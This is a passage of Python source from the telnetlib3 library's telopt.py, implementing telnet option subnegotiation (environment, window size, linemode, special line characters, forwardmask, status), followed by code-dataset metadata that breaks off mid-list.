\n def _handle_sb_env(self, buf):\n assert len(buf) > 2, ('SE: buffer too short: %r' % (buf,))\n kind = buf.popleft()\n opt = buf.popleft()\n assert opt in (IS, INFO, SEND), opt\n assert kind == NEW_ENVIRON\n if opt == SEND:\n self._handle_sb_env_send(buf)\n if opt in (IS, INFO):\n assert self.is_server, ('SE: cannot recv from server: %s %s' % (\n _name_command(kind), 'IS' if opt == IS else 'INFO',))\n if opt == IS:\n if not self.pending_option.enabled(SB + kind + SEND + IS):\n self.log.debug('%s IS unsolicited', _name_command(opt))\n self.pending_option[SB + kind + SEND + IS] = False\n if self.pending_option.get(SB + kind + SEND + IS, None) is False:\n # a pending option value of 'False' means it previously\n # completed; subsequent environment values should have been\n # sent as INFO ..\n self.log.debug('%s IS already recv; expected INFO.',\n _name_command(kind))\n breaks = [idx for (idx, byte) in enumerate(buf)\n if byte in (theNULL, b'\\x03')]\n env = {}\n # not the best looking code, how do we splice & split bytes ..?\n decoded = bytes([ord(byte) for byte in buf]).decode('ascii')\n # a final sentinel break ensures the last pair is not lost.\n for start, end in zip(breaks, breaks[1:] + [len(buf)]):\n pair = decoded[start + 1:end].split('\\x01', 1)\n if 2 == len(pair):\n key, value = pair\n env[key] = value\n self.log.debug('sb_env %s: %r', _name_command(opt), env)\n self._ext_callback[kind](env)\n return\n\n def _handle_sb_env_send(self, buf):\n raise NotImplementedError # recv by client\n\n def _handle_sb_sndloc(self, buf):\n location_str = b''.join(buf).decode('ascii')\n self._ext_callback[SNDLOC](location_str)\n\n def _handle_sb_naws(self, buf):\n assert buf.popleft() == NAWS\n columns = (256 * ord(buf[0])) + ord(buf[1])\n rows = (256 * ord(buf[2])) + ord(buf[3])\n self.log.debug('sb_naws: %d, %d', columns, rows)\n self._ext_callback[NAWS](columns, rows)\n\n def _handle_sb_lflow(self, buf):\n \"\"\" Handle receipt of (IAC, SB, LFLOW).\n \"\"\" # XXX\n assert buf.popleft() == LFLOW\n assert self.local_option.enabled(LFLOW), (\n 'received IAC SB LFLOW without IAC DO LFLOW')\n self.log.debug('sb_lflow: %r', buf)\n\n def _handle_sb_linemode(self, buf):\n assert buf.popleft() == LINEMODE\n cmd = buf.popleft()\n if cmd == LMODE_MODE:\n self._handle_sb_linemode_mode(buf)\n elif cmd == LMODE_SLC:\n self._handle_sb_linemode_slc(buf)\n elif cmd in (DO, DONT, WILL, WONT):\n opt = buf.popleft()\n self.log.debug('recv SB LINEMODE %s FORWARDMASK%s.',\n _name_command(cmd), '(...)' if len(buf) else '')\n assert opt == LMODE_FORWARDMASK, (\n 'Illegal byte follows IAC SB LINEMODE %s: %r, '\n 'expected LMODE_FORWARDMASK.' % (_name_command(cmd), opt))\n self._handle_sb_forwardmask(cmd, buf)\n else:\n raise ValueError('Illegal IAC SB LINEMODE command, %r' % (\n _name_command(cmd),))\n\n def _handle_sb_linemode_mode(self, buf):\n assert len(buf) == 1\n self._linemode = Linemode(buf[0])\n self.log.debug('Linemode MODE is %s.' % (self.linemode,))\n\n def _handle_sb_linemode_slc(self, buf):\n \"\"\" Process and reply to linemode SLC command function triplets. \"\"\"\n assert 0 == len(buf) % 3, ('SLC buffer must be byte triplets')\n self._slc_start()\n while len(buf):\n func = buf.popleft()\n flag = buf.popleft()\n value = buf.popleft()\n self._slc_process(func, SLC_definition(flag, value))\n self._slc_end()\n self.request_forwardmask()\n
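\n # An illustrative triplet (values are examples, not from this\n # module): (SLC_IP, SLC_VARIABLE, b'\\x03') advertises that\n # 'interrupt process' is bound to ^C and may be re-mapped.\n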
\n def _handle_sb_forwardmask(self, cmd, buf):\n # set and report about pending options by 2-byte opt,\n if self.is_server:\n assert self.remote_option.enabled(LINEMODE), (\n 'cannot recv LMODE_FORWARDMASK %s (%r) '\n 'without first sending DO LINEMODE.' % (cmd, buf,))\n assert cmd not in (DO, DONT), (\n 'cannot recv %s LMODE_FORWARDMASK on server end' % (\n _name_command(cmd),))\n if self.is_client:\n assert self.local_option.enabled(LINEMODE), (\n 'cannot recv %s LMODE_FORWARDMASK without first '\n 'sending WILL LINEMODE.' % (_name_command(cmd),))\n assert cmd not in (WILL, WONT), (\n 'cannot recv %s LMODE_FORWARDMASK on client end' % (\n _name_command(cmd),))\n assert cmd != DONT or len(buf) == 0, (\n 'Illegal bytes follow DONT LMODE_FORWARDMASK: %r' % (\n buf,))\n assert cmd != DO or len(buf), (\n 'bytes must follow DO LMODE_FORWARDMASK')\n if cmd in (WILL, WONT):\n self._forwardmask_enabled = cmd == WILL\n elif cmd in (DO, DONT):\n self._forwardmask_enabled = cmd == DO\n if cmd == DO:\n self._handle_do_forwardmask(buf)\n\n def _handle_do_forwardmask(self, buf):\n \"\"\" Handle buffer received in SB LINEMODE DO FORWARDMASK.\n \"\"\" # XXX UNIMPLEMENTED: ( received on client )\n pass\n\n def _send_status(self):\n \"\"\" Respond after DO STATUS received by client (rfc859). \"\"\"\n assert (self.pending_option.enabled(WILL + STATUS)\n or self.local_option.enabled(STATUS)), ('Only the sender '\n 'of IAC WILL STATUS may send IAC SB STATUS IS.')\n response = collections.deque()\n response.extend([IAC, SB, STATUS, IS])\n for opt, status in self.local_option.items():\n # status is 'WILL' for local option states that are True,\n # and 'WONT' for options that are False.\n response.extend([WILL if status else WONT, opt])\n for opt, status in self.remote_option.items():\n # status is 'DO' for remote option states that are True,\n # or for any DO option requests pending reply. status is\n # 'DONT' for any remote option states that are False,\n # or for any DONT option requests pending reply.\n if status or DO + opt in self.pending_option:\n response.extend([DO, opt])\n elif not status or DONT + opt in self.pending_option:\n response.extend([DONT, opt])\n response.extend([IAC, SE])\n self.log.debug('send: %s', ', '.join([\n _name_command(byte) for byte in response]))\n self.send_iac(bytes([ord(byte) for byte in response]))\n if self.pending_option.enabled(WILL + STATUS):\n self.pending_option[WILL + STATUS] = False\n\n# private Special Linemode Character (SLC) routines\n#\n def _default_slc(self, tabset):\n \"\"\" Set property ``_slctab`` to default SLC tabset, unless it\n is unlisted (as is the case for SLC_MCL+), then set as\n SLC_NOSUPPORT _POSIX_VDISABLE (0xff).\n\n ``_slctab`` is a dictionary of SLC functions, such as SLC_IP,\n to a tuple of the handling character and support level.\n \"\"\"\n self._slctab = {}\n self._default_tabset = tabset\n for slc in range(NSLC + 1):\n self._slctab[bytes([slc])] = tabset.get(bytes([slc]),\n SLC_definition(SLC_NOSUPPORT, _POSIX_VDISABLE))\n\n def _slc_snoop(self, byte):\n \"\"\" Scan ``self._slctab`` for matching byte values.\n\n If any are discovered, the (callback, func_byte, slc_definition)
\n is returned. Otherwise (None, None, None) is returned.\n \"\"\"\n # scan byte for SLC function mappings, if any, return function\n for slc_func, slc_def in self._slctab.items():\n if byte == slc_def.val and slc_def.val != theNULL:\n callback = self._slc_callback.get(slc_func, None)\n return (callback, slc_func, slc_def)\n return (None, None, None)\n\n def _slc_end(self):\n \"\"\" Send any pending SLC changes stored in ``_slc_buffer``. \"\"\"\n if 0 == len(self._slc_buffer):\n self.log.debug('slc_end: IAC SE')\n else:\n self.write(b''.join(self._slc_buffer), oob=True)\n self.log.debug('slc_end: (%r) IAC SE', b''.join(self._slc_buffer))\n self.send_iac(IAC + SE)\n self._slc_buffer.clear()\n\n def _slc_start(self):\n \"\"\" Send IAC SB LINEMODE SLC header \"\"\"\n self.send_iac(IAC + SB + LINEMODE + LMODE_SLC)\n self.log.debug('slc_start: IAC + SB + LINEMODE + SLC')\n\n def _slc_send(self):\n \"\"\" Send all special characters that are supported \"\"\"\n send_count = 0\n for func in range(NSLC + 1):\n if self._slctab[bytes([func])].nosupport:\n continue\n if func == 0 and not self.is_server:\n # only the server may send an octet with the first\n # byte (func) set as 0 (SLC_NOSUPPORT).\n continue\n self._slc_add(bytes([func]))\n send_count += 1\n self.log.debug('slc_send: %d', send_count)\n\n def _slc_add(self, func, slc_def=None):\n \"\"\" Buffer an SLC triplet response as (function, flag, value),\n for the given SLC_func byte and slc_def instance providing\n byte attributes ``flag`` and ``val``. If no slc_def is provided,\n the slc definition of ``_slctab`` is used by key ``func``.\n \"\"\"\n assert len(self._slc_buffer) < self.SLC_MAXSIZE, ('SLC: buffer full')\n if slc_def is None:\n slc_def = self._slctab[func]\n self.log.debug('_slc_add (%s, %s)',\n name_slc_command(func), slc_def)\n self._slc_buffer.extend([func, slc_def.mask, slc_def.val])\n\n def _slc_process(self, func, slc_def):\n \"\"\" Process an SLC definition provided by remote end.\n\n Ensure the function definition is in-bounds and an SLC option\n we support. Store SLC_VARIABLE changes to self._slctab, keyed\n by SLC byte function ``func``.\n\n The special definition (0, SLC_DEFAULT|SLC_VARIABLE, 0) has the\n side-effect of replying with a full slc tabset, resetting to\n the default tabset, if indicated.
\"\"\"\n self.log.debug('_slc_process %s mine=%s, his=%s',\n name_slc_command(func), self._slctab[func], slc_def)\n\n # out of bounds checking\n if ord(func) > NSLC:\n self.log.warn('SLC not supported (out of range): (%r)', func)\n self._slc_add(func, SLC_nosupport())\n return\n\n # process special request\n if func == theNULL:\n if slc_def.level == SLC_DEFAULT:\n # client requests we send our default tab,\n self.log.info('SLC_DEFAULT')\n self._default_slc(self._default_tabset)\n self._slc_send()\n elif slc_def.level == SLC_VARIABLE:\n # client requests we send our current tab,\n self.log.info('SLC_VARIABLE')\n self._slc_send()\n else:\n self.log.warn('func(0) flag expected, got %s.', slc_def)\n return\n\n # evaluate slc\n mylevel, myvalue = (self._slctab[func].level, self._slctab[func].val)\n if slc_def.level == mylevel and myvalue == slc_def.val:\n return\n elif slc_def.level == mylevel and slc_def.ack:\n return\n elif slc_def.ack:\n self.log.debug('slc value mismatch with ack bit set: (%r,%r)',\n myvalue, slc_def.val)\n return\n else:\n self._slc_change(func, slc_def)\n\n def _slc_change(self, func, slc_def):\n \"\"\" Update SLC tabset with SLC definition provided by remote end.\n\n Modify prviate attribute ``_slctab`` appropriately for the level\n and value indicated, except for slc tab functions of SLC_NOSUPPORT.\n\n Reply as appropriate ..\n \"\"\"\n hislevel, hisvalue = slc_def.level, slc_def.val\n mylevel, myvalue = self._slctab[func].level, self._slctab[func].val\n if hislevel == SLC_NOSUPPORT:\n # client end reports SLC_NOSUPPORT; use a\n # nosupport definition with ack bit set\n self._slctab[func] = SLC_nosupport()\n self._slctab[func].set_flag(SLC_ACK)\n self._slc_add(func)\n return\n\n if hislevel == SLC_DEFAULT:\n # client end requests we use our default level\n if mylevel == SLC_DEFAULT:\n # client end telling us to use SLC_DEFAULT on an SLC we do not\n # support (such as SYNCH). Set flag to SLC_NOSUPPORT instead\n # of the SLC_DEFAULT value that it begins with\n self._slctab[func].set_mask(SLC_NOSUPPORT)\n else:\n # set current flag to the flag indicated in default tab\n self._slctab[func].set_mask(DEFAULT_SLC_TAB.get(func).mask)\n # set current value to value indicated in default tab\n self._slctab[func].set_value(DEFAULT_SLC_TAB.get(func,\n SLC_nosupport()).val)\n self._slc_add(func)\n return\n\n # client wants to change to a new value, or,\n # refuses to change to our value, accept their value.\n if self._slctab[func].val != theNULL:\n self._slctab[func].set_value(slc_def.val)\n self._slctab[func].set_mask(slc_def.mask)\n slc_def.set_flag(SLC_ACK)\n self._slc_add(func, slc_def)\n return\n\n # if our byte value is b'\\x00', it is not possible for us to support\n # this request. 
\n # If our level is default, just ack whatever was sent;\n # it is a value we cannot change.\n if mylevel == SLC_DEFAULT:\n # If our level is default, store & ack whatever was sent\n self._slctab[func].set_mask(slc_def.mask)\n self._slctab[func].set_value(slc_def.val)\n slc_def.set_flag(SLC_ACK)\n self._slc_add(func, slc_def)\n elif slc_def.level == SLC_CANTCHANGE and mylevel == SLC_CANTCHANGE:\n # \"degenerate to SLC_NOSUPPORT\"\n self._slctab[func].set_mask(SLC_NOSUPPORT)\n self._slc_add(func)\n else:\n # mask current level to levelbits (clears ack),\n self._slctab[func].set_mask(self._slctab[func].level)\n if mylevel == SLC_CANTCHANGE:\n self._slctab[func].val = DEFAULT_SLC_TAB.get(\n func, SLC_nosupport()).val\n self._slc_add(func)\n\n def _generate_forwardmask(self):\n \"\"\" Generate a 32-byte or 16-byte Forwardmask() instance\n\n Forwardmask is formed by a bitmask of all 256 possible 8-bit\n keyboard ASCII input values, or, when not 'outbinary', a 16-byte\n 7-bit representation of each value, and whether or not they\n should be \"forwarded\" by the client on the transport stream\n \"\"\"\n # (as opposed to caught locally, such as ^C).\n #\n # Characters requested to be forwarded are any bytes matching a\n # supported SLC function byte in self._slctab.\n #\n # The return value is an instance of ``Forwardmask``, which can\n # be tested by using the __contains__ method::\n #\n # if b'\\x03' in stream.linemode_forwardmask:\n # stream.write(b'Press ^C to exit.\\r\\n')\n if not self.local_option.enabled(BINARY):\n # 7-bit mask: 16 bytes cover characters 0..127.\n num_bytes, msb = 16, 128\n else:\n num_bytes, msb = 32, 256\n mask32 = [theNULL] * num_bytes\n for mask in range(msb // 8):\n start = mask * 8\n last = start + 7\n byte = theNULL\n for char in range(start, last + 1):\n (func, slc_name, slc_def) = self._slc_snoop(bytes([char]))\n if func is not None and not slc_def.nosupport:\n # set bit for this character, it is a supported slc char\n byte = bytes([ord(byte) | 1])\n if char != last:\n # shift byte left for next character,\n # except for the final byte.\n byte = bytes([ord(byte) << 1])\n mask32[mask] = byte\n return Forwardmask(b''.join(mask32), ack=self._forwardmask_enabled)\n\n# Class constructor / set-default routines\n#\n def _init_options(self):\n \"\"\" Initialize dictionaries ``pending_option``, ``local_option``,\n ``remote_option``, and call ``set_default_linemode()``.\n \"\"\"\n #: a dictionary of telnet option ``opt`` bytes that follow an\n # *IAC DO* or *DONT* command, and contains a value of ``True``\n # until an *IAC WILL* or *WONT* has been received by remote end.\n # Requests related to extended RFC sub-negotiation are keyed by\n # *SB* ``opt``.\n self.pending_option = Option('pending_option', self.log)\n\n #: a dictionary of telnet option ``byte`` bytes that follow an\n # *IAC WILL* or *WONT* command sent by local end to indicate local\n # capability. For example, if ``local_option[ECHO]`` is ``True``,\n # then this end should echo input received from remote end (note\n # this is not a valid mode for the client end).\n self.local_option = Option('local_option', self.log)\n
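\n # An illustrative test of these tables (a sketch, not from the\n # original module): once negotiation completes, a server might\n # use, e.g.:\n #\n # if self.remote_option.enabled(NAWS):\n # self.request_naws()\n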
\n #: a dictionary of telnet option ``byte`` bytes that follow an\n # *IAC WILL* or *WONT* command received by remote end to indicate\n # remote capability. For example, if remote_option[NAWS] (Negotiate\n # About Window Size) is True, then the window dimensions of the\n # remote client may be determined by ``request_naws()``.\n self.remote_option = Option('remote_option', self.log)\n\n self.set_default_linemode()\n\n def _default_callbacks(self):\n \"\"\" Set default callback dictionaries ``_iac_callback``,\n ``_slc_callback``, and ``_ext_callback`` to default methods of\n matching names, such that IAC + IP, or, the SLC value negotiated\n for SLC_IP, signals a callback to method ``self.handle_ip``.\n \"\"\"\n self._iac_callback = {}\n for iac_cmd, key in DEFAULT_IAC_CALLBACKS:\n self.set_iac_callback(iac_cmd, getattr(self, 'handle_%s' % (key,)))\n\n self._slc_callback = {}\n for slc_cmd, key in DEFAULT_SLC_CALLBACKS:\n self.set_slc_callback(slc_cmd, getattr(self, 'handle_%s' % (key,)))\n\n # extended callbacks may receive various arguments\n self._ext_callback = {}\n for ext_cmd, key in DEFAULT_EXT_CALLBACKS:\n self.set_ext_callback(ext_cmd, getattr(self, 'handle_%s' % (key,)))\n\nclass Linemode(object):\n def __init__(self, mask=LMODE_MODE_LOCAL):\n \"\"\" A mask of ``LMODE_MODE_LOCAL`` means that all line editing is\n performed on the client side (default). A mask of theNULL (\\\\x00)\n indicates that editing is performed on the remote side. Valid\n flags are ``LMODE_MODE_TRAPSIG``, ``LMODE_MODE_ACK``,\n ``LMODE_MODE_SOFT_TAB``, ``LMODE_MODE_LIT_ECHO``.\n \"\"\"\n assert isinstance(mask, bytes) and len(mask) == 1\n self.mask = mask\n\n def set_flag(self, flag):\n \"\"\" Set linemode bitmask ``flag``. \"\"\"\n self.mask = bytes([ord(self.mask) | ord(flag)])\n\n def unset_flag(self, flag):\n \"\"\" Unset linemode bitmask ``flag``. \"\"\"\n # use AND-NOT rather than XOR, so an already-clear flag stays clear.\n self.mask = bytes([ord(self.mask) & ~ord(flag) & 0xff])\n\n @property\n def remote(self):\n \"\"\" True if linemode processing is done on the server end\n (remote processing).\n \"\"\"\n return not self.local\n\n @property\n def local(self):\n \"\"\" True if telnet stream is in EDIT mode (local processing).\n\n When set, the client side of the connection should process all\n input lines, performing any editing functions, and only send\n completed lines to the remote side.\n\n When unset, client side should *not* process any input from the\n user, and the server side should take care of all character\n processing that needs to be done.\n \"\"\"\n return bool(ord(self.mask) & ord(LMODE_MODE_LOCAL))\n\n @property\n def trapsig(self):\n \"\"\" True if signals are trapped by client.\n\n When set, the client side should translate appropriate\n interrupts/signals to their Telnet equivalent. (These would be\n IP, BRK, AYT, ABORT, EOF, and SUSP.)\n\n When unset, the client should pass interrupts/signals as their\n normal ASCII values, if desired, or trap them locally.\n \"\"\"\n return bool(ord(self.mask) & ord(LMODE_MODE_TRAPSIG))\n\n @property\n def ack(self):\n \"\"\" Returns True if the ack bit is set.\n \"\"\"\n return bool(ord(self.mask) & ord(LMODE_MODE_ACK))\n
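\n # An illustrative doctest-style sketch, composing and testing a\n # mode byte from this module's LMODE_MODE_* constants:\n #\n # >>> lm = Linemode(bytes([ord(LMODE_MODE_LOCAL) | ord(LMODE_MODE_ACK)]))\n # >>> lm.local, lm.ack\n # (True, True)\n # >>> str(lm)\n # 'local|ack'\n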
\n @property\n def soft_tab(self):\n \"\"\" When set, the client will expand horizontal tab (\\\\x09)\n into the appropriate number of spaces.\n\n When unset, the client should allow horizontal tab to\n pass through unmodified. This status is only relevant\n for the client end.\n \"\"\"\n return bool(ord(self.mask) & ord(LMODE_MODE_SOFT_TAB))\n\n @property\n def lit_echo(self):\n \"\"\" When set, non-printable characters are displayed as a literal\n character, allowing control characters to write directly to\n the user's screen.\n\n When LIT_ECHO is unset, the client side may echo the character\n in any manner that it desires (e.g.: '^C' for chr(3)).\n \"\"\"\n return bool(ord(self.mask) & ord(LMODE_MODE_LIT_ECHO))\n\n def __str__(self):\n \"\"\" Returns string representation of line mode, for debugging \"\"\"\n if self.mask == bytes([0]):\n return 'remote'\n flags = []\n # we say 'local' to indicate that 'edit' mode means that all\n # input processing is done locally, instead of the obtusely named\n # flag 'edit'\n if self.local:\n flags.append('local')\n else:\n flags.append('remote')\n if self.trapsig:\n flags.append('trapsig')\n if self.soft_tab:\n flags.append('soft_tab')\n if self.lit_echo:\n flags.append('lit_echo')\n if self.ack:\n flags.append('ack')\n return '|'.join(flags)\n\n#: List of globals that may match an iac command option bytes\n_DEBUG_OPTS = dict([(value, key)\n for key, value in globals().items() if key in\n ('LINEMODE', 'LMODE_FORWARDMASK', 'NAWS', 'NEW_ENVIRON',\n 'ENCRYPT', 'AUTHENTICATION', 'BINARY', 'SGA', 'ECHO',\n 'STATUS', 'TTYPE', 'TSPEED', 'LFLOW', 'XDISPLOC', 'IAC',\n 'DONT', 'DO', 'WONT', 'WILL', 'SE', 'NOP', 'DM', 'TM',\n 'BRK', 'IP', 'ABORT', 'AO', 'AYT', 'EC', 'EL', 'EOR',\n 'GA', 'SB', 'EOF', 'SUSP', 'LOGOUT',\n 'CHARSET', 'SNDLOC')])\n\ndef _name_command(byte):\n \"\"\" Given an IAC byte, return its mnemonic global constant. \"\"\"\n return (repr(byte) if byte not in _DEBUG_OPTS\n else _DEBUG_OPTS[byte])\n\ndef _name_commands(cmds, sep=' '):\n return sep.join([\n _name_command(bytes([byte])) for byte in cmds])\n\n", "sub_path": "telnetlib3/telopt.py", "file_name": "telopt.py", "file_ext": "py", "file_size_in_byte": 73426, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "telnetlib.BRK", "line_number": 35, "usage_type": "name"}, {"api_name": "telnetlib.IP", "line_number": 35, "usage_type": "name"}, {"api_name": "telnetlib.AO", "line_number": 35, "usage_type": "name"}, {"api_name": "telnetlib.AYT", "line_number": 35, "usage_type": "name"}, {"api_name": "telnetlib.EC", "line_number": 35, "usage_type": "name"}, {"api_name": "telnetlib.EL", "line_number": 36, "usage_type": "name"}, {"api_name": "telnetlib.NOP", "line_number": 37, "usage_type": "name"}, {"api_name": "telnetlib.DM", "line_number": 37, "usage_type": "name"}, {"api_name": "telnetlib.GA", "line_number": 37, "usage_type": "name"}, {"api_name": "slc.SLC_SYNCH", "line_number": 39, "usage_type": "name"}, {"api_name": "slc.SLC_BRK", "line_number": 39, "usage_type": "name"}, {"api_name": "slc.SLC_IP", "line_number": 39, "usage_type": "name"}, {"api_name": "slc.SLC_AO", "line_number": 40, "usage_type": "name"}, {"api_name": "slc.SLC_AYT", "line_number": 40, "usage_type": "name"}, {"api_name": "slc.SLC_EOR", "line_number": 40, "usage_type": "name"}, {"api_name": "slc.SLC_ABORT", "line_number": 41, "usage_type": "name"}, {"api_name": "slc.SLC_EOF", "line_number": 41, "usage_type": "name"}, {"api_name": "slc.SLC_SUSP", "line_number": 41, "usage_type": "name"}, {"api_name": "slc.SLC_EC", "line_number": 42, "usage_type": "name"}, {"api_name": "slc.SLC_EL", "line_number": 42, "usage_type": "name"}, {"api_name": "slc.SLC_EW", "line_number": 42,
"usage_type": "name"}, {"api_name": "slc.SLC_RP", "line_number": 42, "usage_type": "name"}, {"api_name": "slc.SLC_LNEXT", "line_number": 43, "usage_type": "name"}, {"api_name": "slc.SLC_XON", "line_number": 43, "usage_type": "name"}, {"api_name": "slc.SLC_XOFF", "line_number": 43, "usage_type": "name"}, {"api_name": "telnetlib.TTYPE", "line_number": 45, "usage_type": "name"}, {"api_name": "telnetlib.TSPEED", "line_number": 45, "usage_type": "name"}, {"api_name": "telnetlib.XDISPLOC", "line_number": 45, "usage_type": "name"}, {"api_name": "telnetlib.NEW_ENVIRON", "line_number": 46, "usage_type": "name"}, {"api_name": "telnetlib.NAWS", "line_number": 46, "usage_type": "name"}, {"api_name": "telnetlib.LOGOUT", "line_number": 46, "usage_type": "name"}, {"api_name": "telnetlib.SNDLOC", "line_number": 47, "usage_type": "name"}, {"api_name": "telnetlib.IAC", "line_number": 56, "usage_type": "argument"}, {"api_name": "slc.NSLC", "line_number": 103, "usage_type": "name"}, {"api_name": "telnetlib.LINEMODE", "line_number": 113, "usage_type": "argument"}, {"api_name": "telnetlib.ECHO", "line_number": 114, "usage_type": "argument"}, {"api_name": "telnetlib.SGA", "line_number": 115, "usage_type": "argument"}, {"api_name": "telnetlib.LINEMODE", "line_number": 117, "usage_type": "argument"}, {"api_name": "telnetlib.ECHO", "line_number": 118, "usage_type": "argument"}, {"api_name": "telnetlib.SGA", "line_number": 119, "usage_type": "argument"}, {"api_name": "slc.DEFAULT_SLC_TAB", "line_number": 152, "usage_type": "name"}, {"api_name": "collections.deque", "line_number": 193, "usage_type": "call"}, {"api_name": "collections.deque", "line_number": 195, "usage_type": "call"}, {"api_name": "telnetlib.DO", "line_number": 218, "usage_type": "name"}, {"api_name": "telnetlib.DONT", "line_number": 218, "usage_type": "name"}, {"api_name": "telnetlib.WILL", "line_number": 218, "usage_type": "name"}, {"api_name": "telnetlib.WONT", "line_number": 218, "usage_type": "name"}, {"api_name": "telnetlib.SB", "line_number": 218, "usage_type": "name"}, {"api_name": "telnetlib.IAC", "line_number": 222, "usage_type": "name"}, {"api_name": "telnetlib.SB", "line_number": 224, "usage_type": "name"}, {"api_name": "telnetlib.IAC", "line_number": 226, "usage_type": "argument"}, {"api_name": "telnetlib.SB", "line_number": 239, "usage_type": "name"}, {"api_name": "telnetlib.SE", "line_number": 243, "usage_type": "name"}, {"api_name": "telnetlib.SB", "line_number": 256, "usage_type": "name"}, {"api_name": "telnetlib.DO", "line_number": 266, "usage_type": "name"}, {"api_name": "telnetlib.WILL", "line_number": 269, "usage_type": "name"}, {"api_name": "telnetlib.WILL", "line_number": 270, "usage_type": "name"}, {"api_name": "telnetlib.DONT", "line_number": 271, "usage_type": "name"}, {"api_name": "telnetlib.WILL", "line_number": 273, "usage_type": "name"}, {"api_name": "telnetlib.WILL", "line_number": 274, "usage_type": "name"}, {"api_name": "telnetlib.WILL", "line_number": 276, "usage_type": "name"}, {"api_name": "telnetlib.DO", "line_number": 277, "usage_type": "name"}, {"api_name": "telnetlib.TM", "line_number": 277, "usage_type": "name"}, {"api_name": "telnetlib.DO", "line_number": 281, "usage_type": "name"}, {"api_name": "telnetlib.DO", "line_number": 282, "usage_type": "name"}, {"api_name": "telnetlib.DONT", "line_number": 283, "usage_type": "name"}, {"api_name": "telnetlib.DONT", "line_number": 284, "usage_type": "name"}, {"api_name": "telnetlib.WONT", "line_number": 285, "usage_type": "name"}, {"api_name": "telnetlib.DO", 
"line_number": 287, "usage_type": "name"}, {"api_name": "telnetlib.DO", "line_number": 291, "usage_type": "name"}, {"api_name": "telnetlib.TM", "line_number": 291, "usage_type": "name"}, {"api_name": "telnetlib.LINEMODE", "line_number": 297, "usage_type": "argument"}, {"api_name": "slc.name_slc_command", "line_number": 303, "usage_type": "call"}, {"api_name": "slc.SLC_XON", "line_number": 324, "usage_type": "name"}, {"api_name": "telnetlib.BINARY", "line_number": 342, "usage_type": "argument"}, {"api_name": "telnetlib.IAC", "line_number": 356, "usage_type": "argument"}, {"api_name": "telnetlib.DM", "line_number": 368, "usage_type": "name"}, {"api_name": "telnetlib.DO", "line_number": 369, "usage_type": "name"}, {"api_name": "telnetlib.DONT", "line_number": 369, "usage_type": "name"}, {"api_name": "telnetlib.WILL", "line_number": 369, "usage_type": "name"}, {"api_name": "telnetlib.WONT", "line_number": 369, "usage_type": "name"}, {"api_name": "telnetlib.LINEMODE", "line_number": 372, "usage_type": "name"}, {"api_name": "telnetlib.DO", "line_number": 373, "usage_type": "name"}, {"api_name": "telnetlib.WILL", "line_number": 375, "usage_type": "name"}, {"api_name": "telnetlib.DO", "line_number": 377, "usage_type": "name"}, {"api_name": "telnetlib.DO", "line_number": 382, "usage_type": "name"}, {"api_name": "telnetlib.WILL", "line_number": 382, "usage_type": "name"}, {"api_name": "telnetlib.WILL", "line_number": 388, "usage_type": "name"}, {"api_name": "telnetlib.TM", "line_number": 388, "usage_type": "name"}, {"api_name": "telnetlib.DONT", "line_number": 393, "usage_type": "name"}, {"api_name": "telnetlib.LOGOUT", "line_number": 393, "usage_type": "name"}, {"api_name": "telnetlib.WONT", "line_number": 401, "usage_type": "name"}, {"api_name": "telnetlib.IAC", "line_number": 404, "usage_type": "name"}, {"api_name": "telnetlib.IAC", "line_number": 406, "usage_type": "name"}, {"api_name": "telnetlib.SGA", "line_number": 426, "usage_type": "argument"}, {"api_name": "telnetlib.IAC", "line_number": 427, "usage_type": "name"}, {"api_name": "telnetlib.GA", "line_number": 427, "usage_type": "name"}, {"api_name": "telnetlib.STATUS", "line_number": 440, "usage_type": "argument"}, {"api_name": "telnetlib.SB", "line_number": 442, "usage_type": "name"}, {"api_name": "telnetlib.STATUS", "line_number": 442, "usage_type": "name"}, {"api_name": "telnetlib.SB", "line_number": 443, "usage_type": "name"}, {"api_name": "telnetlib.STATUS", "line_number": 443, "usage_type": "name"}, {"api_name": "telnetlib.IAC", "line_number": 445, "usage_type": "name"}, {"api_name": "telnetlib.SB", "line_number": 445, "usage_type": "name"}, {"api_name": "telnetlib.STATUS", "line_number": 445, "usage_type": "name"}, {"api_name": "telnetlib.SE", "line_number": 445, "usage_type": "name"}, {"api_name": "telnetlib.SB", "line_number": 447, "usage_type": "name"}, {"api_name": "telnetlib.STATUS", "line_number": 447, "usage_type": "name"}, {"api_name": "telnetlib.TSPEED", "line_number": 458, "usage_type": "argument"}, {"api_name": "telnetlib.SB", "line_number": 460, "usage_type": "name"}, {"api_name": "telnetlib.TSPEED", "line_number": 460, "usage_type": "name"}, {"api_name": "telnetlib.SB", "line_number": 461, "usage_type": "name"}, {"api_name": "telnetlib.TSPEED", "line_number": 461, "usage_type": "name"}, {"api_name": "telnetlib.IAC", "line_number": 462, "usage_type": "name"}, {"api_name": "telnetlib.SB", "line_number": 462, "usage_type": "name"}, {"api_name": "telnetlib.TSPEED", "line_number": 462, "usage_type": "name"}, {"api_name": 
"telnetlib.SE", "line_number": 462, "usage_type": "name"}, {"api_name": "telnetlib.CHARSET", "line_number": 475, "usage_type": "argument"}, {"api_name": "telnetlib.SB", "line_number": 479, "usage_type": "name"}, {"api_name": "telnetlib.CHARSET", "line_number": 479, "usage_type": "name"}, {"api_name": "telnetlib.SB", "line_number": 480, "usage_type": "name"}, {"api_name": "telnetlib.CHARSET", "line_number": 480, "usage_type": "name"}, {"api_name": "telnetlib.IAC", "line_number": 481, "usage_type": "name"}, {"api_name": "telnetlib.SB", "line_number": 481, "usage_type": "name"}, {"api_name": "telnetlib.CHARSET", "line_number": 481, "usage_type": "name"}, {"api_name": "telnetlib.IAC", "line_number": 483, "usage_type": "name"}, {"api_name": "telnetlib.SE", "line_number": 483, "usage_type": "name"}, {"api_name": "telnetlib.NEW_ENVIRON", "line_number": 506, "usage_type": "name"}, {"api_name": "telnetlib.SB", "line_number": 512, "usage_type": "name"}, {"api_name": "telnetlib.SB", "line_number": 516, "usage_type": "name"}, {"api_name": "collections.deque", "line_number": 517, "usage_type": "call"}, {"api_name": "telnetlib.IAC", "line_number": 518, "usage_type": "name"}, {"api_name": "telnetlib.SB", "line_number": 518, "usage_type": "name"}, {"api_name": "telnetlib.theNULL", "line_number": 522, "usage_type": "argument"}, {"api_name": "telnetlib.IAC", "line_number": 523, "usage_type": "name"}, {"api_name": "telnetlib.SE", "line_number": 523, "usage_type": "name"}, {"api_name": "telnetlib.XDISPLOC", "line_number": 534, "usage_type": "argument"}, {"api_name": "telnetlib.SB", "line_number": 536, "usage_type": "name"}, {"api_name": "telnetlib.XDISPLOC", 